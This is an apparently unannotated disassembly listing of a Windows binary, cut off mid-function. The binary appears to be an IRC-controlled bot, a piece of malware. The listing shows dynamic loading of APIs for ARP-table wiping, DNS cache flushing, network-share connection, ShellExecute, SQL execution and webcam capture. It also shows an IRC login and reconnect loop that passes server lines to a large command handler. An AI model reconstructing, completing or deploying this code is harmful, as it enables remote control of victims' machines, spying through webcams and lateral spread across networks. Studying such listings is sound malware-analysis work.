push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401D85
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_4441F0, eax
call esi ; GetProcAddress
cmp ds:dword_4441F0, ebx
mov ds:dword_44416C, eax
jz short loc_401D90
cmp eax, ebx
jnz short loc_401D9A
jmp short loc_401D90
; ---------------------------------------------------------------------------
loc_401D85: ; CODE XREF: sub_4012D6+A85�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442A8, eax
loc_401D90: ; CODE XREF: sub_4012D6+AA7�j
; sub_4012D6+AAD�j
mov ds:dword_4442A4, 1
loc_401D9A: ; CODE XREF: sub_4012D6+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401DCF
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_44410C, eax
call esi ; GetProcAddress
cmp ds:dword_44410C, ebx
mov ds:dword_444174, eax
jz short loc_401DDA
cmp eax, ebx
jnz short loc_401DE4
jmp short loc_401DDA
; ---------------------------------------------------------------------------
loc_401DCF: ; CODE XREF: sub_4012D6+ACF�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442B0, eax
loc_401DDA: ; CODE XREF: sub_4012D6+AF1�j
; sub_4012D6+AF7�j
mov ds:dword_4442AC, 1
loc_401DE4: ; CODE XREF: sub_4012D6+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401E43
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_4441AC, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_444240, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_4440D8, eax
call esi ; GetProcAddress
cmp ds:dword_4441AC, ebx
mov ds:dword_444090, eax
jz short loc_401E4E
cmp ds:dword_444240, ebx
jz short loc_401E4E
cmp ds:dword_4440D8, ebx
jz short loc_401E4E
cmp eax, ebx
jnz short loc_401E58
jmp short loc_401E4E
; ---------------------------------------------------------------------------
loc_401E43: ; CODE XREF: sub_4012D6+B19�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442B8, eax
loc_401E4E: ; CODE XREF: sub_4012D6+B55�j
; sub_4012D6+B5D�j ...
mov ds:dword_4442B4, 1
loc_401E58: ; CODE XREF: sub_4012D6+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401E8D
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_444214, eax
call esi ; GetProcAddress
cmp ds:dword_444214, ebx
mov ds:dword_4440D0, eax
jz short loc_401E98
cmp eax, ebx
jnz short loc_401EA2
jmp short loc_401E98
; ---------------------------------------------------------------------------
loc_401E8D: ; CODE XREF: sub_4012D6+B8D�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442C0, eax
loc_401E98: ; CODE XREF: sub_4012D6+BAF�j
; sub_4012D6+BB5�j
mov ds:dword_4442BC, 1
loc_401EA2: ; CODE XREF: sub_4012D6+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401F2B
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_4441F8, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_4440B4, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_444210, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_444128, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_4441BC, eax
call esi ; GetProcAddress
cmp ds:dword_4441F8, ebx
mov ds:dword_4440C4, eax
jz short loc_401F36
cmp ds:dword_4440B4, ebx
jz short loc_401F36
cmp ds:dword_444210, ebx
jz short loc_401F36
cmp ds:dword_444128, ebx
jz short loc_401F36
cmp ds:dword_4441BC, ebx
jz short loc_401F36
cmp eax, ebx
jnz short loc_401F40
jmp short loc_401F36
; ---------------------------------------------------------------------------
loc_401F2B: ; CODE XREF: sub_4012D6+BD7�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442C8, eax
loc_401F36: ; CODE XREF: sub_4012D6+C2D�j
; sub_4012D6+C35�j ...
mov ds:dword_4442C4, 1
loc_401F40: ; CODE XREF: sub_4012D6+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401F75
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_444138, eax
call esi ; GetProcAddress
cmp ds:dword_444138, ebx
mov ds:dword_44419C, eax
jz short loc_401F80
cmp eax, ebx
jnz short loc_401F8A
jmp short loc_401F80
; ---------------------------------------------------------------------------
loc_401F75: ; CODE XREF: sub_4012D6+C75�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442D0, eax
loc_401F80: ; CODE XREF: sub_4012D6+C97�j
; sub_4012D6+C9D�j
mov ds:dword_4442CC, 1
loc_401F8A: ; CODE XREF: sub_4012D6+C9B�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_4012D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F92 proc near ; CODE XREF: sub_40274D+2349�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_444264, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_401FDA
push ds:dword_444268
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_401FDA: ; CODE XREF: sub_401F92+1A�j
cmp ds:dword_44426C, esi
jz short loc_40200E
push ds:dword_444270
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_40200E: ; CODE XREF: sub_401F92+4E�j
cmp ds:dword_444274, esi
jz short loc_402042
push ds:dword_444278
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_402042: ; CODE XREF: sub_401F92+82�j
cmp ds:dword_44427C, esi
jz short loc_402076
push ds:dword_444280
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_402076: ; CODE XREF: sub_401F92+B6�j
cmp ds:dword_444284, esi
jz short loc_4020AA
push ds:dword_444288
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_4020AA: ; CODE XREF: sub_401F92+EA�j
cmp ds:dword_44428C, esi
jz short loc_4020DE
push ds:dword_444290
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_4020DE: ; CODE XREF: sub_401F92+11E�j
cmp ds:dword_444294, esi
jz short loc_402112
push ds:dword_444298
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_402112: ; CODE XREF: sub_401F92+152�j
cmp ds:dword_44429C, esi
jz short loc_402146
push ds:dword_4442A0
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_402146: ; CODE XREF: sub_401F92+186�j
cmp ds:dword_4442A4, esi
jz short loc_40217A
push ds:dword_4442A8
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_40217A: ; CODE XREF: sub_401F92+1BA�j
cmp ds:dword_4442AC, esi
jz short loc_4021AE
push ds:dword_4442B0
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_4021AE: ; CODE XREF: sub_401F92+1EE�j
cmp ds:dword_4442B4, esi
jz short loc_4021E2
push ds:dword_4442B8
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_4021E2: ; CODE XREF: sub_401F92+222�j
cmp ds:dword_4442BC, esi
jz short loc_402216
push ds:dword_4442C0
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_402216: ; CODE XREF: sub_401F92+256�j
cmp ds:dword_4442C4, esi
jz short loc_40224A
push ds:dword_4442C8
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_40224A: ; CODE XREF: sub_401F92+28A�j
cmp ds:dword_4442CC, esi
jz short loc_40227E
push ds:dword_4442D0
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_41E6A6
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 20h
loc_40227E: ; CODE XREF: sub_401F92+2BE�j
lea eax, [ebp+var_200]
push offset unk_42BF4C
push eax
call sub_41E6A6
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_4022AB
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_4022AB: ; CODE XREF: sub_401F92+302�j
lea eax, [ebp+var_200]
push eax
call sub_417D70
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_401F92 endp
; =============== S U B R O U T I N E =======================================
sub_4022BD proc near ; CODE XREF: sub_4025EF+136�p
; sub_40274D+59AF�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_4022E5
push [esp+arg_0]
call ds:dword_444168 ; gethostbyname
test eax, eax
jnz short loc_4022DE
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4022DE: ; CODE XREF: sub_4022BD+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_4022E5: ; CODE XREF: sub_4022BD+D�j
retn
sub_4022BD endp
; =============== S U B R O U T I N E =======================================
sub_4022E6 proc near ; CODE XREF: sub_4025EF+A2�p
mov ecx, ds:dword_4441F0
xor eax, eax
test ecx, ecx
jz short locret_4022F4
jmp ecx
; ---------------------------------------------------------------------------
locret_4022F4: ; CODE XREF: sub_4022E6+A�j
retn
sub_4022E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4022F5 proc near ; CODE XREF: sub_40274D:loc_4049BF�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
lea eax, [ebp+78h+var_8]
xor edi, edi
push eax
push edi
xor esi, esi
mov [ebp+78h+var_8], edi
mov [ebp+78h+var_4], ebx
call ds:dword_44410C ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz short loc_40237B
sub ecx, 32h
jz loc_4023C2
sub ecx, 48h
jz short loc_402350
sub ecx, 6Eh
jz short loc_402349
loc_402335: ; CODE XREF: sub_4022F5+84�j
push eax
lea eax, [ebp+78h+var_88]
push offset unk_42C160
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_4023A3
; ---------------------------------------------------------------------------
loc_402349: ; CODE XREF: sub_4022F5+3E�j
push offset unk_42C13C
jmp short loc_402398
; ---------------------------------------------------------------------------
loc_402350: ; CODE XREF: sub_4022F5+39�j
push [ebp+78h+var_8]
call sub_41E5D3
push [ebp+78h+var_8]
mov esi, eax
push edi
push esi
call sub_41E5F0
add esp, 10h
cmp esi, edi
jz short loc_402393
push ebx
lea eax, [ebp+78h+var_8]
push eax
push esi
call ds:dword_44410C ; GetIpNetTable
cmp eax, edi
jnz short loc_402335
loc_40237B: ; CODE XREF: sub_4022F5+2B�j
cmp [esi], edi
jbe short loc_4023B0
lea ebx, [esi+4]
loc_402382: ; CODE XREF: sub_4022F5+9A�j
push ebx
call ds:dword_444174 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_402382
jmp short loc_4023B0
; ---------------------------------------------------------------------------
loc_402393: ; CODE XREF: sub_4022F5+74�j
push offset unk_42C10C
loc_402398: ; CODE XREF: sub_4022F5+59�j
; sub_4022F5+D2�j
lea eax, [ebp+78h+var_88]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_4023A3: ; CODE XREF: sub_4022F5+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], edi
call sub_417D70
pop ecx
loc_4023B0: ; CODE XREF: sub_4022F5+88�j
; sub_4022F5+9C�j
push esi
call sub_41E2A1
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_4023C2: ; CODE XREF: sub_4022F5+30�j
push offset unk_42C0DC
jmp short loc_402398
sub_4022F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023C9 proc near ; CODE XREF: sub_40274D+2037�p
; sub_40274D+2162�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
push eax
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_444068 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_4442D4
push esi
call sub_41E6A6
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_4023C9 endp
; =============== S U B R O U T I N E =======================================
sub_402422 proc near ; CODE XREF: sub_415825+29F�p
; sub_415825+2D9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_40244D
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_402440: ; CODE XREF: sub_402422+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_402440
pop edi
jmp short loc_402451
; ---------------------------------------------------------------------------
loc_40244D: ; CODE XREF: sub_402422+A�j
mov esi, [esp+4+arg_0]
loc_402451: ; CODE XREF: sub_402422+29�j
test ecx, ecx
jz short loc_40245A
movzx eax, byte ptr [esi]
add edx, eax
loc_40245A: ; CODE XREF: sub_402422+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_402422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_402472 proc near ; CODE XREF: sub_4025EF+E0�p
var_1A90 = byte ptr -1A90h
var_A90 = byte ptr -0A90h
var_2C0 = byte ptr -2C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1A90h
lea ebp, [esp-58h]
call sub_41EA20
push esi
xor esi, esi
push 3
mov [ebp+58h+var_8], esi
lea eax, [ebp+58h+var_2C0]
pop ecx
loc_402490: ; CODE XREF: sub_402472+27�j
mov byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_402490
cmp ds:byte_4D1FD8, 0
jz short loc_4024B9
push offset byte_4D1FD8
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_4011F5
add esp, 0Ch
loc_4024B9: ; CODE XREF: sub_402472+30�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_20]
push esi
push esi
push 2
push eax
call sub_40AB83
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_A0]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_41E6A6
add esp, 14h
lea eax, [ebp+58h+var_A0]
push esi
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+58h+var_A0]
push eax
push [ebp+58h+arg_0]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40251A
push [ebp+58h+arg_0]
call ds:dword_444218 ; closesocket
push 1388h
call ds:dword_42B014 ; Sleep
xor eax, eax
jmp loc_4025E9
; ---------------------------------------------------------------------------
loc_40251A: ; CODE XREF: sub_402472+8B�j
push ebx
push edi
mov ebx, 1000h
jmp loc_4025B0
; ---------------------------------------------------------------------------
loc_402526: ; CODE XREF: sub_402472+163�j
lea eax, [ebp+58h+var_A90]
push eax
lea eax, [ebp+58h+var_1A90]
push eax
call sub_41AC0E
cmp eax, esi
pop ecx
pop ecx
mov [ebp+58h+var_C], eax
mov [ebp+58h+var_4], esi
jle short loc_4025B0
lea edi, [ebp+58h+var_A90]
loc_40254B: ; CODE XREF: sub_402472+13A�j
xor esi, esi
inc esi
loc_40254E: ; CODE XREF: sub_402472+11D�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_8]
push esi
push eax
lea eax, [ebp+58h+var_140]
push eax
lea eax, [ebp+58h+var_2C0]
push eax
push [ebp+58h+arg_18]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push dword ptr [edi]
call sub_40274D
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_402591
push 7D0h
call ds:dword_42B014 ; Sleep
jmp short loc_40254E
; ---------------------------------------------------------------------------
loc_402591: ; CODE XREF: sub_402472+110�j
cmp esi, 0FFFFFFFDh
jz short loc_4025E4
cmp esi, 0FFFFFFFEh
jz short loc_4025DF
cmp esi, 0FFFFFFFFh
jz short loc_4025DB
inc [ebp+58h+var_4]
mov eax, [ebp+58h+var_4]
add edi, 4
cmp eax, [ebp+58h+var_C]
jl short loc_40254B
xor esi, esi
loc_4025B0: ; CODE XREF: sub_402472+AF�j
; sub_402472+D1�j
push ebx
lea eax, [ebp+58h+var_1A90]
push esi
push eax
call sub_41E5F0
add esp, 0Ch
push esi
push ebx
lea eax, [ebp+58h+var_1A90]
push eax
push [ebp+58h+arg_0]
call ds:dword_444064 ; recv
test eax, eax
jg loc_402526
loc_4025DB: ; CODE XREF: sub_402472+12C�j
xor eax, eax
jmp short loc_4025E7
; ---------------------------------------------------------------------------
loc_4025DF: ; CODE XREF: sub_402472+127�j
xor eax, eax
inc eax
jmp short loc_4025E7
; ---------------------------------------------------------------------------
loc_4025E4: ; CODE XREF: sub_402472+122�j
push 2
pop eax
loc_4025E7: ; CODE XREF: sub_402472+16B�j
; sub_402472+170�j
pop edi
pop ebx
loc_4025E9: ; CODE XREF: sub_402472+A3�j
pop esi
add ebp, 58h
leave
retn
sub_402472 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4025EF proc near ; CODE XREF: sub_40A263+4D0�p
; DATA XREF: sub_40274D+6340�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 190h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_190]
rep movsd
mov dword ptr [eax+160h], 1
jmp loc_4026FB
; ---------------------------------------------------------------------------
loc_40261B: ; CODE XREF: sub_4025EF+141�j
push 1Ch
lea eax, [ebp+74h+var_2C]
push 0
push eax
call sub_41E5F0
push 0
push ds:dword_43C098
lea eax, [ebp+74h+var_2C]
push ds:dword_43C094
push eax
call sub_40AB83
mov edi, eax
mov eax, [ebp+74h+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_444500
push edi
push eax
call sub_41E860
add esp, 28h
push 6
push 1
push 2
call ds:dword_444100 ; socket
mov esi, eax
mov eax, [ebp+74h+var_34]
imul eax, 234h
mov ds:dword_4444F4[eax], esi
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40269D
push esi
call ds:dword_444218 ; closesocket
call sub_4022E6
push 7D0h
jmp short loc_4026EE
; ---------------------------------------------------------------------------
loc_40269D: ; CODE XREF: sub_4025EF+99�j
lea eax, [ebp+74h+var_18C]
push eax
push offset unk_42C6BC
call sub_417DE4
push [ebp+74h+var_38]
lea eax, [ebp+74h+var_18C]
push eax
lea eax, [ebp+74h+var_8C]
push eax
push [ebp+74h+var_190]
lea eax, [ebp+74h+var_CC]
push edi
push eax
lea eax, [ebp+74h+var_10C]
push eax
push esi
call sub_402472
add esp, 28h
push esi
mov edi, eax
call ds:dword_444218 ; closesocket
test edi, edi
jz short loc_4026FB
cmp edi, 1
jnz short loc_4026F6
push 0DBBA0h
loc_4026EE: ; CODE XREF: sub_4025EF+AC�j
call ds:dword_42B014 ; Sleep
jmp short loc_4026FB
; ---------------------------------------------------------------------------
loc_4026F6: ; CODE XREF: sub_4025EF+F8�j
cmp edi, 2
jz short loc_402738
loc_4026FB: ; CODE XREF: sub_4025EF+27�j
; sub_4025EF+F3�j ...
push 10h
lea eax, [ebp+74h+var_10]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
push [ebp+74h+var_3C]
mov [ebp+74h+var_10], 2
call ds:dword_444260 ; htons
mov [ebp+74h+var_E], ax
lea eax, [ebp+74h+var_18C]
push eax
call sub_4022BD
test eax, eax
pop ecx
mov [ebp+74h+var_C], eax
jnz loc_40261B
jmp short loc_402744
; ---------------------------------------------------------------------------
loc_402738: ; CODE XREF: sub_4025EF+10A�j
push [ebp+74h+var_34]
call sub_40B149
pop ecx
push 2
pop eax
loc_402744: ; CODE XREF: sub_4025EF+147�j
pop edi
pop esi
add ebp, 74h
leave
retn 4
sub_4025EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=4Ch
sub_40274D proc near ; CODE XREF: sub_402472+103�p
var_5D90 = byte ptr -5D90h
var_5990 = byte ptr -5990h
var_5590 = byte ptr -5590h
var_5400 = byte ptr -5400h
var_5200 = byte ptr -5200h
var_50FC = byte ptr -50FCh
var_4FFC = byte ptr -4FFCh
var_4EF8 = byte ptr -4EF8h
var_4DF8 = byte ptr -4DF8h
var_4CF8 = byte ptr -4CF8h
var_4BF8 = byte ptr -4BF8h
var_4AF8 = byte ptr -4AF8h
var_48F8 = byte ptr -48F8h
var_47F4 = byte ptr -47F4h
var_46F4 = byte ptr -46F4h
var_45F4 = byte ptr -45F4h
var_4590 = byte ptr -4590h
var_4390 = byte ptr -4390h
var_4290 = byte ptr -4290h
var_4190 = byte ptr -4190h
var_4090 = byte ptr -4090h
var_3F90 = dword ptr -3F90h
var_3F8C = dword ptr -3F8Ch
var_3F88 = byte ptr -3F88h
var_3F08 = byte ptr -3F08h
var_3E88 = byte ptr -3E88h
var_3E08 = byte ptr -3E08h
var_3D88 = byte ptr -3D88h
var_3D08 = dword ptr -3D08h
var_3D04 = dword ptr -3D04h
var_3D00 = dword ptr -3D00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = byte ptr -3CF8h
var_3C78 = byte ptr -3C78h
var_3B74 = byte ptr -3B74h
var_3A70 = dword ptr -3A70h
var_3A6C = dword ptr -3A6Ch
var_3A68 = dword ptr -3A68h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = byte ptr -3A5Ch
var_37D5 = byte ptr -37D5h
var_37D4 = byte ptr -37D4h
var_36D0 = dword ptr -36D0h
var_36C8 = dword ptr -36C8h
var_36C4 = dword ptr -36C4h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B4 = dword ptr -36B4h
var_36B0 = dword ptr -36B0h
var_36AC = byte ptr -36ACh
var_362C = byte ptr -362Ch
var_35AC = byte ptr -35ACh
var_352C = byte ptr -352Ch
var_34AC = dword ptr -34ACh
var_34A8 = dword ptr -34A8h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = byte ptr -3498h
var_3418 = byte ptr -3418h
var_3398 = byte ptr -3398h
var_3318 = byte ptr -3318h
var_3298 = dword ptr -3298h
var_3294 = dword ptr -3294h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = byte ptr -3284h
var_3204 = byte ptr -3204h
var_3184 = byte ptr -3184h
var_3104 = byte ptr -3104h
var_3084 = dword ptr -3084h
var_3080 = dword ptr -3080h
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = byte ptr -3070h
var_2FF0 = byte ptr -2FF0h
var_2F70 = byte ptr -2F70h
var_2EF0 = byte ptr -2EF0h
var_2E70 = dword ptr -2E70h
var_2E6C = dword ptr -2E6Ch
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = byte ptr -2E60h
var_2D5C = dword ptr -2D5Ch
var_2D58 = byte ptr -2D58h
var_2C54 = byte ptr -2C54h
var_2B50 = dword ptr -2B50h
var_2B4C = dword ptr -2B4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = byte ptr -2B44h
var_2AC4 = dword ptr -2AC4h
var_2AC0 = dword ptr -2AC0h
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB0 = byte ptr -2AB0h
var_2998 = byte ptr -2998h
var_2918 = dword ptr -2918h
var_2914 = dword ptr -2914h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = byte ptr -2900h
var_2880 = byte ptr -2880h
var_2780 = byte ptr -2780h
var_2680 = dword ptr -2680h
var_267C = dword ptr -267Ch
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
